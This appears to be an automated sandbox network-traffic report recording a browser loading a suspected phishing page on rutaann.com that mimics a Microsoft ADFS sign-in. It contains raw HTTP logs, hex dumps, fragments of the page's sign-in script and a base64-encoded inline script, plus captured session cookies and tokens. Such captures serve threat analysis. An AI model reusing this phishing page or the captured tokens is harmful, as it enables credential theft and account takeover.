                                                        2025-03-25 20:29:52 UTC4054INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 d8 00 00 00 2e 08 06 00 00 00 4a eb d7 e9 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 32 20 37 39 2e 31 35 39 32 38 34 2c 20 32 30 31 36 2f 30 34 2f 31 39 2d 31 33 3a 31 33 3a 34 30 20 20
                                                        Data Ascii: PNGIHDR.JtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.449780103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:53 UTC1868OUTGET /adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:53 UTC287INHTTP/1.1 200 OK
                                                        Content-Length: 4054
                                                        Content-Type: image/png
                                                        Expires: Thu, 24 Apr 2025 20:29:53 GMT
                                                        ETag: 112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:53 GMT
                                                        Connection: close
                                                        2025-03-25 20:29:53 UTC4054INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 d8 00 00 00 2e 08 06 00 00 00 4a eb d7 e9 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 32 20 37 39 2e 31 35 39 32 38 34 2c 20 32 30 31 36 2f 30 34 2f 31 39 2d 31 33 3a 31 33 3a 34 30 20 20
                                                        Data Ascii: PNGIHDR.JtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.449781103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:53 UTC3505OUTGET /adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:54 UTC849INHTTP/1.1 200 OK
                                                        Cache-Control: no-cache,no-store
                                                        Pragma: no-cache
                                                        content-length: 61557
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:53 GMT
                                                        Connection: close
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-25 20:29:54 UTC15535INData Raw: 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47 39 6a 64 57 31 6c 62 6e 51 75 63 58 56 6c 63 6e 6c 54 5a 57 78 6c 59 33 52 76 63 69 67 69 4c 6e 4a 76 64 47 46 30 5a 53 31 6a 62 47 46 7a 63 79 49 70 4b 53 42 37
                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"> <head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7
                                                        2025-03-25 20:29:54 UTC16384INData Raw: 76 61 72 20 6b 6d 73 69 49 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6b 6d 73 69 49 6e 70 75 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 64 42 61 6e 6e 65 72 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 42 61 6e 6e 65 72 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 75 73 65 72 6e 61 6d 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 64 42 61 6e 6e 65 72 4f 70 74 69 6f 6e 73 50 61 67 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 42 61 6e 6e 65 72 4f 70 74 69 6f 6e 73 50 61 67 65 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 75 73 65 72 6e 61 6d 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20
                                                        Data Ascii: var kmsiInput = document.getElementById("kmsiInput"); if (idBanner) { idBanner.innerText = username; } if (idBannerOptionsPage) { idBannerOptionsPage.innerText = username; }
                                                        2025-03-25 20:29:54 UTC16384INData Raw: 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 66 72 6f 74 61 74 65 47 5f 30 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 35 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 2e 30 35 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 2e 30 35 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 2e 30 35 73 3b 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: .9s; -moz-animation-delay: 0.9s; } #frotateG_05 { right: 0; top: 51px; animation-delay: 1.05s; -o-animation-delay: 1.05s; -ms-animation-delay: 1.05s;
                                                        2025-03-25 20:29:54 UTC13254INData Raw: 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 68 72 64 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 68 72 64 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 61 70 70 49 6e 73 69 67 68 74 73 2e 74 72 61 63 6b 50 61 67 65 56 69 65 77 28 22 48 6f 6d 65 52 65 61 6c 6d 44 69 73 63 6f 76 65 72 79 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 63 6f 6e 73 6f 6c 65 20 26 26 20 5f 73 65 6c 66 2e 64 65 62 75 67 67 69 6e 67 29 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 50 72 6f 64 75 63 65 50 61 67 65 44 65 74 65 63 74 69 6f 6e 54 65 6c 65 6d 65 74 72 79 3a 20 46 6f 75 6e 64 20 48 52 44 20 50 61 67 65 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20
                                                        Data Ascii: d = document.getElementById('hrd'); if (hrd) { window.appInsights.trackPageView("HomeRealmDiscovery"); if(console && _self.debugging) console.log("ProducePageDetectionTelemetry: Found HRD Page"); return;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.449782103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:55 UTC2768OUTGET /adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:56 UTC289INHTTP/1.1 200 OK
                                                        Content-Length: 17453
                                                        Content-Type: image/jpeg
                                                        Expires: Thu, 24 Apr 2025 20:29:56 GMT
                                                        ETag: D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:56 GMT
                                                        Connection: close
                                                        2025-03-25 20:29:56 UTC16095INData Raw: ff d8 ff e1 09 50 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e
                                                        Data Ascii: Phttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syn
                                                        2025-03-25 20:29:56 UTC1358INData Raw: 00 14 00 10 01 54 45 41 00 14 14 00 00 00 00 05 51 00 00 00 05 45 40 00 01 41 ff d5 dc 00 74 61 05 41 00 80 08 a0 20 00 00 00 00 84 54 01 14 04 15 00 00 00 04 00 50 45 01 05 84 04 08 00 00 00 00 00 00 00 00 00 02 42 28 09 05 01 05 01 05 0a 20 a4 04 08 40 05 40 51 14 50 00 00 00 01 00 05 00 41 50 00 50 00 00 00 00 00 00 45 15 14 00 00 00 00 00 01 00 00 00 00 14 01 14 01 04 55 00 00 10 00 00 00 51 04 14 00 00 00 00 00 45 00 00 00 00 40 00 05 40 55 00 00 10 51 14 00 00 01 14 00 00 10 11 40 41 41 50 54 10 01 01 51 45 45 40 14 04 00 01 15 15 00 01 40 00 00 04 51 15 05 40 00 00 00 00 40 00 00 10 51 01 54 00 45 10 14 01 50 51 04 51 01 44 00 00 00 04 05 14 00 00 01 00 00 00 00 14 00 00 05 00 40 54 15 51 14 00 00 00 00 05 01 15 14 00 01 40 04 05 40 14 00 01 ff d6
                                                        Data Ascii: TEAQE@AtaA TPEB( @@QPAPPEUQE@@UQ@AAPTQEE@@Q@@QTEPQQD@TQ@@


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.44978652.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:56 UTC531OUTOPTIONS /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type,sdk-context
                                                        Origin: https://rutaann.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rutaann.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:56 UTC423INHTTP/1.1 204 No Content
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: Origin,X-Requested-With,Content-Name,Content-Type,Accept,Cache-Control,Sdk-Context,X-Set-Cross-Origin-Resource-Policy,Content-Encoding
                                                        Access-Control-Allow-Methods: POST
                                                        Access-Control-Max-Age: 3600
                                                        Date: Tue, 25 Mar 2025 20:29:56 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.44978552.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:56 UTC531OUTOPTIONS /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type,sdk-context
                                                        Origin: https://rutaann.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rutaann.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:56 UTC423INHTTP/1.1 204 No Content
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: Origin,X-Requested-With,Content-Name,Content-Type,Accept,Cache-Control,Sdk-Context,X-Set-Cross-Origin-Resource-Policy,Content-Encoding
                                                        Access-Control-Allow-Methods: POST
                                                        Access-Control-Max-Age: 3600
                                                        Date: Tue, 25 Mar 2025 20:29:56 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.44978752.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:56 UTC638OUTPOST /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        Content-Length: 3180
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-type: application/json
                                                        Sdk-Context: appId
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://rutaann.com
